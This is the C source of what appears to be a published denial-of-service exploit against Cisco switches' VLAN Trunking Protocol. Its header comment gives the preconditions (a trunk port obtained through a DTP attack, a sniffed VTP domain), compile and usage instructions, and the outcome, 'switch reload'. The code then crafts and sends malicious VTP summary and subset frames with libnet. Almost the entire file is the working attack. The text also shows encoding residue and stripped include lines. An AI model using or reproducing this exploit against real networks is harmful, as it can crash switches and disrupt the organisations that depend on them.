/*DoS code for Cisco VLAN Trunking Protocol Vulnerability=0D
*=0D
*vulerability discription:=0D
*http://www.cisco.com/warp/public/707/cisco-sr-20081105-vtp.shtml=0D
*=0D
*To Known:=0D
* 1.the switch must in Server/Client Mode.=0D
* 2.the port ,attacker connected,must be in trunk Mode.=0D
* Cisco Ethernet ports with no configuration are not=0D
* in trunk.but trunk mode can be obtained through DTP=0D
* attack by Yersinia.=0D
* 3.you must known the vtp domain,this can be sniffed=0D
* 4.some codes are from Yersinia.=0D
*=0D
*Result:=0D
* switch reload.=0D
*=0D
*=0D
*Compile:=0D
* gcc -o vtp `libnet-config --libs` vtp.c=0D
*=0D
*Usage:vtp -i -d =0D
*=0D
*Contact: showrun.lee[AT]gmail.com=0D
*http://sh0wrun.blogspot.com/=0D
*/=0D
#include =0D
#include =0D
#include =0D
=0D
#define VTP_DOMAIN_SIZE 32=0D
#define VTP_TIMESTAMP_SIZE 12=0D
=0D
struct vtp_summary {=0D
u_int8_t version;=0D
u_int8_t code;=0D
u_int8_t followers;=0D
u_int8_t dom_len;=0D
u_int8_t domain[VTP_DOMAIN_SIZE];=0D
u_int32_t revision;=0D
u_int32_t updater;=0D
u_int8_t timestamp[VTP_TIMESTAMP_SIZE];=0D
u_int8_t md5[16];=0D
};=0D
=0D
struct vtp_subset {=0D
u_int8_t version;=0D
u_int8_t code;=0D
u_int8_t seq;=0D
u_int8_t dom_len;=0D
u_int8_t domain[VTP_DOMAIN_SIZE];=0D
u_int32_t revision;=0D
};=0D
=0D
void usage( char *s) {=0D
printf("%s -i -d \n",s);=0D
exit (1);=0D
}=0D
=0D
int main( int argc, char *argv[] )=0D
{=0D
int opt,k=0;=0D
extern char *optarg;=0D
libnet_ptag_t t;=0D
libnet_t *lhandler;=0D
u_int32_t vtp_len=0, sent;=0D
struct vtp_summary *vtp_summ;=0D
struct vtp_subset *vtp_sub;=0D
u_int8_t *vtp_packet,*vtp_packet2, *aux;=0D
u_int8_t cisco_data[]={ 0x00, 0x00, 0x0c, 0x20, 0x03 };=0D
u_int8_t dst_mac[6]={ 0x01,0x00,0x0c,0xcc,0xcc,0xcc };=0D
u_int8_t aaa[8]={ 0x22,0x00,0x11,0x22,0x11,0x00,0x00,0x00 };=0D
struct libnet_ether_addr *mymac;=0D
char *device;=0D
char error_information[LIBNET_ERRBUF_SIZE];=0D
char *domain;=0D
=0D
// get options=0D
while ((opt = getopt(argc, argv, "i:d:")) != -1)=0D
{=0D
switch (opt) {=0D
case 'i':=0D
device=malloc(strlen(optarg));=0D
strcpy(device,optarg);=0D
k=1;=0D
break;=0D
=0D
case 'd':=0D
domain=malloc(strlen(optarg));=0D
strcpy(domain,optarg);=0D
break;=0D
=0D
default: usage(argv[0]);=0D
}=0D
}=0D
if(!k) { printf(" %s -i -d \n must assign the interface\n",argv[0]);exit(1);}=0D
=0D
//init libnet=0D
=0D
lhandler=libnet_init(LIBNET_LINK,device,error_information);=0D
if (!lhandler) {=0D
fprintf(stderr, "libnet_init: %s\n", error_information);=0D
return -1;=0D
}=0D
=0D
mymac=libnet_get_hwaddr(lhandler);=0D
//build the first packet for vtp_summary=0D
vtp_len = sizeof(cisco_data)+sizeof(struct vtp_summary);=0D
vtp_packet = calloc(1,vtp_len);=0D
aux = vtp_packet;=0D
memcpy(vtp_packet,cisco_data,sizeof(cisco_data));=0D
aux+=sizeof(cisco_data);=0D
vtp_summ = (struct vtp_summary *)aux;=0D
vtp_summ->version = 0x01;=0D
vtp_summ->code = 0x01;//vtp_summary=0D
vtp_summ->followers = 0x01;=0D
vtp_summ->dom_len = strlen(domain);=0D
memcpy(vtp_summ->domain,domain,strlen(domain));=0D
vtp_summ->revision = htonl(2000);//bigger than the current revision number will ok=0D
t = libnet_build_802_2(=0D
0xaa, /* DSAP */=0D
0xaa, /* SSAP */=0D
0x03, /* control */=0D
vtp_packet, /* payload */=0D
vtp_len, /* payload size */=0D
lhandler, /* libnet handle */=0D
0); /* libnet id */=0D
t = libnet_build_802_3(=0D
dst_mac, /* ethernet destination */=0D
mymac->ether_addr_octet, /* ethernet source */=0D
LIBNET_802_2_H + vtp_len, /* frame size */=0D
NULL, /* payload */=0D
0, /* payload size */=0D
lhandler, /* libnet handle */=0D
0); /* libnet id */=0D
=0D
sent = libnet_write(lhandler);=0D
=0D
if (sent == -1) {=0D
libnet_clear_packet(lhandler);=0D
free(vtp_packet);=0D
return -1;=0D
}=0D
libnet_clear_packet(lhandler);=0D
=0D
//build the second vtp packet for vtp_subset=0D
vtp_len = sizeof(cisco_data)+sizeof(struct vtp_subset);=0D
vtp_packet2 = calloc(1,vtp_len);=0D
aux = vtp_packet2;=0D
memcpy(vtp_packet2,cisco_data,sizeof(cisco_data));=0D
aux+=sizeof(cisco_data);=0D
=0D
vtp_sub = (struct vtp_subset *)aux;=0D
vtp_sub->version = 0x01;=0D
vtp_sub->code = 0x02; //vtp_subset=0D
vtp_sub->seq = 0x01;=0D
vtp_sub->dom_len = strlen(domain);=0D
memcpy(vtp_sub->domain,domain,strlen(domain));=0D
vtp_sub->revision = htonl(2000);//bigger than the current revision number will ok=0D
// memcpy(vtp_sub->aaa,aaa,strlen(aaa));=0D
=0D
t = libnet_build_802_2(=0D
0xaa, /* DSAP */=0D
0xaa, /* SSAP */=0D
0x03, /* control */=0D
vtp_packet2, /* payload */=0D
vtp_len, /* payload size */=0D
lhandler, /* libnet handle */=0D
0); /* libnet id */=0D
t = libnet_build_802_3(=0D
dst_mac, /* ethernet destination */=0D
mymac->ether_addr_octet, /* ethernet source */=0D
LIBNET_802_2_H + vtp_len, /* frame size */=0D
NULL, /* payload */=0D
0, /* payload size */=0D
lhandler, /* libnet handle */=0D
0); /* libnet id */=0D
=0D
sent = libnet_write(lhandler);=0D
if (sent == -1) {=0D
libnet_clear_packet(lhandler);=0D
free(vtp_packet);=0D
return -1;=0D
}=0D
libnet_clear_packet(lhandler);=0D
}